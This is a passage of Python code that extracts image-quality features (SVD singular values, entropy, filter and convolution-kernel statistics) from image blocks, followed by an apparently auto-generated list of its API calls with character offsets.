if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
if 'sv_entropy_std_filters' in data_type:
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
sv_vector = []
sv_entropy_list = []
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_entropy = [utils.get_entropy_contribution_of_i(s, id_sv) for id_sv, sv in enumerate(s)]
sv_entropy_list.append(sv_entropy)
sv_std = []
sv_array = np.array(sv_vector)
_, length = sv_array.shape
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
s_arr = compression.get_SVD_s(arr)
data = s_arr[indices]
if 'convolutional_kernels' in data_type:
sub_zones = segmentation.divide_in_blocks(block, (20, 20))
data = []
diff_std_list_3 = []
diff_std_list_5 = []
diff_mean_list_3 = []
diff_mean_list_5 = []
plane_std_list_3 = []
plane_std_list_5 = []
plane_mean_list_3 = []
plane_mean_list_5 = []
plane_max_std_list_3 = []
plane_max_std_list_5 = []
plane_max_mean_list_3 = []
plane_max_mean_list_5 = []
for sub_zone in sub_zones:
l_img = transform.get_LAB_L(sub_zone)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (3, 3)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (3, 3))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_3.append(std_diff)
diff_mean_list_3.append(mean_diff)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_5.append(std_diff)
diff_mean_list_5.append(mean_diff)
# plane mean with window of size (3, 3)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (3, 3))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_3.append(std_plane_mean)
plane_mean_list_3.append(mean_plane_mean)
# plane mean with window of size (5, 5)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (5, 5))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_5.append(std_plane_mean)
plane_mean_list_5.append(mean_plane_mean)
# plane max error with window of size (3, 3)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (3, 3))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_3.append(std_plane_max)
plane_max_mean_list_3.append(mean_plane_max)
# plane max error with window of size (5, 5)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (5, 5))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_5.append(std_plane_max)
plane_max_mean_list_5.append(mean_plane_max)
diff_std_list_3 = np.array(diff_std_list_3)
diff_std_list_5 = np.array(diff_std_list_5)
diff_mean_list_3 = np.array(diff_mean_list_3)
diff_mean_list_5 = np.array(diff_mean_list_5)
plane_std_list_3 = np.array(plane_std_list_3)
plane_std_list_5 = np.array(plane_std_list_5)
plane_mean_list_3 = np.array(plane_mean_list_3)
plane_mean_list_5 = np.array(plane_mean_list_5)
plane_max_std_list_3 = np.array(plane_max_std_list_3)
plane_max_std_list_5 = np.array(plane_max_std_list_5)
plane_max_mean_list_3 = np.array(plane_max_mean_list_3)
plane_max_mean_list_5 = np.array(plane_max_mean_list_5)
if 'std_max_blocks' in data_type:
data.append(np.std(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'mean_max_blocks' in data_type:
data.append(np.mean(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'std_normed' in data_type:
data.append(np.std(diff_std_list_3))
data.append(np.std(diff_mean_list_3))
data.append(np.std(diff_std_list_5))
data.append(np.std(diff_mean_list_5))
data.append(np.std(plane_std_list_3))
data.append(np.std(plane_mean_list_3))
data.append(np.std(plane_std_list_5))
data.append(np.std(plane_mean_list_5))
data.append(np.std(plane_max_std_list_3))
data.append(np.std(plane_max_mean_list_3))
data.append(np.std(plane_max_std_list_5))
data.append(np.std(plane_max_mean_list_5))
if 'mean_normed' in data_type:
data.append(np.mean(diff_std_list_3))
data.append(np.mean(diff_mean_list_3))
data.append(np.mean(diff_std_list_5))
data.append(np.mean(diff_mean_list_5))
data.append(np.mean(plane_std_list_3))
data.append(np.mean(plane_mean_list_3))
data.append(np.mean(plane_std_list_5))
data.append(np.mean(plane_mean_list_5))
data.append(np.mean(plane_max_std_list_3))
data.append(np.mean(plane_max_mean_list_3))
data.append(np.mean(plane_max_std_list_5))
data.append(np.mean(plane_max_mean_list_5))
data = np.array(data)
if data_type == 'convolutional_kernel_stats_svd':
l_img = transform.get_LAB_L(block)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
# getting sigma vector from SVD compression
s = compression.get_SVD_s(normed_diff)
data = s
if data_type == 'svd_entropy':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_noise_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
sv_size = len(sv)
values.append(utils.get_entropy(sv[int(sv_size / 4):]))
data = np.array(values)
return data
def w2d(arr, mode='haar', level=1):
#convert to float
imArray = arr
np.divide(imArray, 255)
# compute coefficients
coeffs=pywt.wavedec2(imArray, mode, level=level)
#Process Coefficients
coeffs_H=list(coeffs)
coeffs_H[0] *= 0
# reconstruction
imArray_H = pywt.waverec2(coeffs_H, mode)
imArray_H *= 255
imArray_H = np.uint8(imArray_H)
return imArray_H
def _get_mscn_variance(block, sub_block_size=(50, 50)):
blocks = segmentation.divide_in_blocks(block, sub_block_size)
data = []
for block in blocks:
mscn_coefficients = transform.get_mscn_coefficients(block)
flat_coeff = mscn_coefficients.flatten()
data.append(np.var(flat_coeff))
return np.sort(data)
| [
"numpy.uint8",
"sys.path.insert",
"ipfml.utils.get_entropy_contribution_of_i",
"ipfml.utils.normalize_2D_arr",
"ipfml.utils.get_indices_of_lowest_values",
"cv2.filter2D",
"numpy.array",
"sklearn.decomposition.FastICA",
"pywt.waverec2",
"ipfml.processing.transform.rgb_to_mscn",
"numpy.divide",
... | [((538, 560), 'sys.path.insert', 'sys.path.insert', (['(0)', '""""""'], {}), "(0, '')\n", (553, 560), False, 'import sys\n'), ((23763, 23786), 'numpy.divide', 'np.divide', (['imArray', '(255)'], {}), '(imArray, 255)\n', (23772, 23786), True, 'import numpy as np\n'), ((23827, 23868), 'pywt.wavedec2', 'pywt.wavedec2', (['imArray', 'mode'], {'level': 'level'}), '(imArray, mode, level=level)\n', (23840, 23868), False, 'import pywt\n'), ((23983, 24012), 'pywt.waverec2', 'pywt.waverec2', (['coeffs_H', 'mode'], {}), '(coeffs_H, mode)\n', (23996, 24012), False, 'import pywt\n'), ((24050, 24069), 'numpy.uint8', 'np.uint8', (['imArray_H'], {}), '(imArray_H)\n', (24058, 24069), True, 'import numpy as np\n'), ((24163, 24215), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', 'sub_block_size'], {}), '(block, sub_block_size)\n', (24192, 24215), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((24425, 24438), 'numpy.sort', 'np.sort', (['data'], {}), '(data)\n', (24432, 24438), True, 'import numpy as np\n'), ((1021, 1049), 'ipfml.processing.transform.rgb_to_mscn', 'transform.rgb_to_mscn', (['block'], {}), '(block)\n', (1042, 1049), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1290, 1326), 'PIL.Image.open', 'Image.open', (['mscn_revisited_file_path'], {}), '(mscn_revisited_file_path)\n', (1300, 1326), False, 'from PIL import Image\n'), ((1377, 1409), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img_block'], {}), '(img_block)\n', (1398, 1409), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1830, 1871), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(6)'], {}), '(block, 6)\n', (1861, 1871), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1887, 1920), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_6'], {}), '(low_bits_6)\n', (1908, 1920), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1978, 2019), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(5)'], {}), '(block, 5)\n', (2009, 2019), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2035, 2068), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_5'], {}), '(low_bits_5)\n', (2056, 2068), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2126, 2167), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(4)'], {}), '(block, 4)\n', (2157, 2167), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2183, 2216), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_4'], {}), '(low_bits_4)\n', (2204, 2216), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2274, 2315), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(3)'], {}), '(block, 3)\n', (2305, 2315), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2331, 2364), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_3'], {}), '(low_bits_3)\n', (2352, 2364), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2422, 2463), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(2)'], {}), '(block, 2)\n', (2453, 2463), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2479, 2512), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_2'], {}), '(low_bits_2)\n', (2500, 2512), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2698, 2715), 'numpy.asarray', 'np.asarray', (['block'], {}), '(block)\n', (2708, 2715), True, 'import numpy as np\n'), ((2840, 2901), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (2869, 2901), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((3566, 3582), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (3576, 3582), True, 'import numpy as np\n'), ((3649, 3666), 'numpy.asarray', 'np.asarray', (['block'], {}), '(block)\n', (3659, 3666), True, 'import numpy as np\n'), ((3791, 3852), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (3820, 3852), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((4397, 4413), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (4407, 4413), True, 'import numpy as np\n'), ((4471, 4488), 'numpy.asarray', 'np.asarray', (['block'], {}), '(block)\n', (4481, 4488), True, 'import numpy as np\n'), ((4613, 4674), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (4642, 4674), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((5044, 5060), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (5054, 5060), True, 'import numpy as np\n'), ((5125, 5142), 'numpy.asarray', 'np.asarray', (['block'], {}), '(block)\n', (5135, 5142), True, 'import numpy as np\n'), ((5267, 5328), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (5296, 5328), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((5755, 5771), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (5765, 5771), True, 'import numpy as np\n'), ((6144, 6160), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (6154, 6160), True, 'import numpy as np\n'), ((6378, 6394), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (6388, 6394), True, 'import numpy as np\n'), ((6562, 6588), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (6581, 6588), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((6604, 6628), 'sklearn.decomposition.FastICA', 'FastICA', ([], {'n_components': '(50)'}), '(n_components=50)\n', (6611, 6628), False, 'from sklearn.decomposition import FastICA\n'), ((6795, 6833), 'ipfml.utils.normalize_2D_arr', 'utils.normalize_2D_arr', (['image_restored'], {}), '(image_restored)\n', (6817, 6833), False, 'from ipfml import utils\n'), ((6856, 6892), 'numpy.array', 'np.array', (['(final_image * 255)', '"""uint8"""'], {}), "(final_image * 255, 'uint8')\n", (6864, 6892), True, 'import numpy as np\n'), ((7183, 7209), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (7202, 7209), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7225, 7283), 'sklearn.decomposition.TruncatedSVD', 'TruncatedSVD', ([], {'n_components': '(30)', 'n_iter': '(100)', 'random_state': '(42)'}), '(n_components=30, n_iter=100, random_state=42)\n', (7237, 7283), False, 'from sklearn.decomposition import TruncatedSVD\n'), ((7488, 7522), 'ipfml.processing.compression.get_SVD', 'compression.get_SVD', (['reduced_image'], {}), '(reduced_image)\n', (7507, 7522), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7599, 7625), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (7618, 7625), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7649, 7695), 'sklearn.decomposition.IncrementalPCA', 'IncrementalPCA', ([], {'n_components': '(20)', 'batch_size': '(25)'}), '(n_components=20, batch_size=25)\n', (7663, 7695), False, 'from sklearn.decomposition import IncrementalPCA\n'), ((7916, 7950), 'ipfml.processing.compression.get_SVD', 'compression.get_SVD', (['reduced_image'], {}), '(reduced_image)\n', (7935, 7950), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8115, 8141), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (8134, 8141), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8160, 8186), 'numpy.array', 'np.array', (['lab_img', '"""uint8"""'], {}), "(lab_img, 'uint8')\n", (8168, 8186), True, 'import numpy as np\n'), ((8206, 8242), 'numpy.linalg.svd', 'lin_svd', (['lab_img'], {'full_matrices': '(True)'}), '(lab_img, full_matrices=True)\n', (8213, 8242), True, 'from numpy.linalg import svd as lin_svd\n'), ((8259, 8310), 'numpy.zeros', 'np.zeros', (['(end - begin, end - begin)'], {'dtype': 'complex'}), '((end - begin, end - begin), dtype=complex)\n', (8267, 8310), True, 'import numpy as np\n'), ((8328, 8349), 'numpy.diag', 'np.diag', (['s[begin:end]'], {}), '(s[begin:end])\n', (8335, 8349), True, 'import numpy as np\n'), ((8449, 8478), 'numpy.array', 'np.array', (['output_img', '"""uint8"""'], {}), "(output_img, 'uint8')\n", (8457, 8478), True, 'import numpy as np\n'), ((8495, 8528), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['output_img'], {}), '(output_img)\n', (8516, 8528), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8642, 8668), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (8661, 8668), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8683, 8700), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (8691, 8700), True, 'import numpy as np\n'), ((9027, 9053), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (9048, 9053), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((9268, 9287), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (9276, 9287), True, 'import numpy as np\n'), ((10083, 10109), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (10102, 10109), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((10124, 10141), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (10132, 10141), True, 'import numpy as np\n'), ((10336, 10362), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (10357, 10362), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((10577, 10596), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (10585, 10596), True, 'import numpy as np\n'), ((11392, 11418), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (11411, 11418), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((11433, 11450), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (11441, 11450), True, 'import numpy as np\n'), ((12409, 12435), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (12430, 12435), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((12650, 12669), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (12658, 12669), True, 'import numpy as np\n'), ((13383, 13409), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (13402, 13409), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((13424, 13441), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (13432, 13441), True, 'import numpy as np\n'), ((14697, 14716), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (14705, 14716), True, 'import numpy as np\n'), ((15312, 15338), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (15333, 15338), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((15436, 15482), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(20, 20)'], {}), '(block, (20, 20))\n', (15465, 15482), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((18233, 18258), 'numpy.array', 'np.array', (['diff_std_list_3'], {}), '(diff_std_list_3)\n', (18241, 18258), True, 'import numpy as np\n'), ((18285, 18310), 'numpy.array', 'np.array', (['diff_std_list_5'], {}), '(diff_std_list_5)\n', (18293, 18310), True, 'import numpy as np\n'), ((18339, 18365), 'numpy.array', 'np.array', (['diff_mean_list_3'], {}), '(diff_mean_list_3)\n', (18347, 18365), True, 'import numpy as np\n'), ((18393, 18419), 'numpy.array', 'np.array', (['diff_mean_list_5'], {}), '(diff_mean_list_5)\n', (18401, 18419), True, 'import numpy as np\n'), ((18448, 18474), 'numpy.array', 'np.array', (['plane_std_list_3'], {}), '(plane_std_list_3)\n', (18456, 18474), True, 'import numpy as np\n'), ((18502, 18528), 'numpy.array', 'np.array', (['plane_std_list_5'], {}), '(plane_std_list_5)\n', (18510, 18528), True, 'import numpy as np\n'), ((18558, 18585), 'numpy.array', 'np.array', (['plane_mean_list_3'], {}), '(plane_mean_list_3)\n', (18566, 18585), True, 'import numpy as np\n'), ((18614, 18641), 'numpy.array', 'np.array', (['plane_mean_list_5'], {}), '(plane_mean_list_5)\n', (18622, 18641), True, 'import numpy as np\n'), ((18674, 18704), 'numpy.array', 'np.array', (['plane_max_std_list_3'], {}), '(plane_max_std_list_3)\n', (18682, 18704), True, 'import numpy as np\n'), ((18736, 18766), 'numpy.array', 'np.array', (['plane_max_std_list_5'], {}), '(plane_max_std_list_5)\n', (18744, 18766), True, 'import numpy as np\n'), ((18800, 18831), 'numpy.array', 'np.array', (['plane_max_mean_list_3'], {}), '(plane_max_mean_list_3)\n', (18808, 18831), True, 'import numpy as np\n'), ((18864, 18895), 'numpy.array', 'np.array', (['plane_max_mean_list_5'], {}), '(plane_max_mean_list_5)\n', (18872, 18895), True, 'import numpy as np\n'), ((22222, 22236), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (22230, 22236), True, 'import numpy as np\n'), ((22309, 22335), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (22328, 22335), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22359, 22388), 'ipfml.utils.normalize_2D_arr', 'utils.normalize_2D_arr', (['l_img'], {}), '(l_img)\n', (22381, 22388), False, 'from ipfml import utils\n'), ((22459, 22534), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.min_bilateral_diff', '(5, 5)'], {}), '(normed_l_img, kernels.min_bilateral_diff, (5, 5))\n', (22484, 22534), False, 'from ipfml.filters import convolution, kernels\n'), ((22600, 22634), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['normed_diff'], {}), '(normed_diff)\n', (22621, 22634), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22705, 22731), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (22724, 22731), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22750, 22796), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['l_img', '(20, 20)'], {}), '(l_img, (20, 20))\n', (22779, 22796), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22949, 22965), 'numpy.array', 'np.array', (['values'], {}), '(values)\n', (22957, 22965), True, 'import numpy as np\n'), ((23021, 23047), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (23040, 23047), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23066, 23112), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['l_img', '(20, 20)'], {}), '(l_img, (20, 20))\n', (23095, 23112), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23265, 23281), 'numpy.array', 'np.array', (['values'], {}), '(values)\n', (23273, 23281), True, 'import numpy as np\n'), ((23343, 23369), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (23362, 23369), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23388, 23434), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['l_img', '(20, 20)'], {}), '(l_img, (20, 20))\n', (23417, 23434), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23636, 23652), 'numpy.array', 'np.array', (['values'], {}), '(values)\n', (23644, 23652), True, 'import numpy as np\n'), ((24285, 24323), 'ipfml.processing.transform.get_mscn_coefficients', 'transform.get_mscn_coefficients', (['block'], {}), '(block)\n', (24316, 24323), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((933, 960), 'PIL.Image.open', 'Image.open', (['block_file_path'], {}), '(block_file_path)\n', (943, 960), False, 'from PIL import Image\n'), ((2596, 2638), 'ipfml.processing.transform.rgb_to_LAB_L_bits', 'transform.rgb_to_LAB_L_bits', (['block', '(3, 6)'], {}), '(block, (3, 6))\n', (2623, 2638), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((3401, 3446), 'ipfml.utils.integral_area_trapz', 'utils.integral_area_trapz', (['l_svd_data'], {'dx': '(100)'}), '(l_svd_data, dx=100)\n', (3426, 3446), False, 'from ipfml import utils\n'), ((4880, 4924), 'ipfml.utils.integral_area_trapz', 'utils.integral_area_trapz', (['l_svd_data'], {'dx': '(50)'}), '(l_svd_data, dx=50)\n', (4905, 4924), False, 'from ipfml import utils\n'), ((5527, 5558), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['l_svd_data'], {}), '(l_svd_data)\n', (5546, 5558), False, 'from ipfml import utils\n'), ((5591, 5635), 'ipfml.utils.integral_area_trapz', 'utils.integral_area_trapz', (['l_svd_data'], {'dx': '(50)'}), '(l_svd_data, dx=50)\n', (5616, 5635), False, 'from ipfml import utils\n'), ((6934, 6970), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['current_image'], {}), '(current_image)\n', (6955, 6970), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7016, 7050), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['final_image'], {}), '(final_image)\n', (7037, 7050), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8396, 8425), 'numpy.dot', 'np.dot', (['smat', 'V[begin:end, :]'], {}), '(smat, V[begin:end, :])\n', (8402, 8425), True, 'import numpy as np\n'), ((8790, 8812), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (8799, 8812), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((8836, 8858), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (8845, 8858), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((8882, 8901), 'scipy.signal.wiener', 'wiener', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (8888, 8901), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((8925, 8944), 'scipy.signal.wiener', 'wiener', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (8931, 8944), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((9177, 9203), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (9198, 9203), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((9519, 9554), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (9538, 9554), False, 'from ipfml import utils\n'), ((9692, 9739), 'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (9726, 9739), False, 'from ipfml import utils\n'), ((9798, 9846), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (9833, 9846), False, 'from ipfml import utils\n'), ((10231, 10253), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (10240, 10253), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((10486, 10512), 